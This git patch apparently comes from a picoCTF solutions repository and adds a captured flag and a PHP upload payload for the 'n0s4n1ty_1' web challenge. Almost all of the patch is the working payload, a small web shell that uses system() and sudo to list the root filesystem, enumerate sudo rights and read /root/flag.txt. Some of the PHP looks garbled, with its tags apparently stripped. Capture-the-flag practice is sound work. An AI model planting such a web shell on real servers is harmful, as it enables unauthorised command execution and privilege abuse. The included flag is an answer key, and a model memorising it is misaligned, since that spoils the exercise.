From 68cba64e99fed877084c01200bf8d8775ebaa6e7 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Fri, 3 Jul 2026 13:59:34 +0900 Subject: [PATCH] web/n0s4n1ty_1 --- web/n0s4n1ty_1/flag.txt | 1 + web/n0s4n1ty_1/payload.php | 17 +++++++++++++++++ 2 files changed, 18 insertions(+) create mode 100644 web/n0s4n1ty_1/flag.txt create mode 100644 web/n0s4n1ty_1/payload.php diff --git a/web/n0s4n1ty_1/flag.txt b/web/n0s4n1ty_1/flag.txt new file mode 100644 index 0000000..073da0a --- /dev/null +++ b/web/n0s4n1ty_1/flag.txt @@ -0,0 +1 @@ +picoCTF{wh47_c4n_u_d0_wPHP_5fd11be6} diff --git a/web/n0s4n1ty_1/payload.php b/web/n0s4n1ty_1/payload.php new file mode 100644 index 0000000..07730ec --- /dev/null +++ b/web/n0s4n1ty_1/payload.php @@ -0,0 +1,17 @@ +"; + echo nl2br(system('ls -lah /')); + echo "

"; + + echo "sudo rights:
"; + echo nl2br(system('sudo -l')); + echo "

"; + + echo "'/root' listing:
"; + echo nl2br(system('sudo ls -lah /root')); + echo "

"; + + echo "'/root/flag.txt' contents:
"; + echo nl2br(system('sudo cat /root/flag.txt')); + echo "

"; +?>